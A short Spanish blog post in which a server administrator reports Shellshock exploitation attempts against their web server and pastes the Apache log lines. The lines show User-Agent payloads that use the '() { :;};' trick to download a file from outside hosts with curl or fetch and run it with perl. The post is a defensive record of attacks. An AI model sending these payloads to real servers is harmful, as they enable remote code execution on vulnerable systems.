Mas intentos de shellshock …

Otra noche intensa, ademas de los escaneos automáticos y del chino que sigue probando cuentas ssh (jugamos al bloqueo/desbloqueo) . Esta vez un tio ha estado probando a ver si conseguía explotar Shellshock. No parecía un script automático.

104.130.27.108 – – [18/Nov/2014:01:22:47 +0100] «GET /cgi-bin/php HTTP/1.1» 404 354 «-» «() { :;};/usr/bin/perl /tmp/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:42 +0100] «GET /phppath/php HTTP/1.1» 404 354 «-» «() { :;};/usr/bin/perl /tmp/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:37 +0100] «GET /cgi-sys/php5 HTTP/1.1» 404 355 «-» «() { :;};/usr/bin/perl /tmp/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:32 +0100] «GET /cgi-sys/php5 HTTP/1.1» 404 355 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://162.209.105.206/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:27 +0100] «GET /phppath/cgi_wrapper HTTP/1.1» 404 362 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:22 +0100] «GET /cgi-bin/php5-cli HTTP/1.1» 404 359 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:17 +0100] «GET /cgi-bin/php5 HTTP/1.1» 404 355 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:11 +0100] «GET /cgi-bin/php HTTP/1.1» 404 354 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:06 +0100] «GET /phppath/php HTTP/1.1» 404 354 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:22:01 +0100] «GET /cgi-sys/php5 HTTP/1.1» 404 355 «-» «() { :;}; /usr/bin/fetch -o /tmp/80.jpg http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:21:56 +0100] «GET /cgi-sys/php5 HTTP/1.1» 404 355 «-» «() { :;}; /usr/bin/curl -o /tmp/80.jpg -O http://64.150.180.199/80.jpg»
104.130.27.108 – – [18/Nov/2014:01:21:51 +0100] «GET /phppath/cgi_wrapper HTTP/1.1» 404 362 «-» «() { :;}; /usr/bin/curl -o /tmp/80.jpg -O http://64.150.180.199/80.jpg»

Y así durante al menos un par de horas…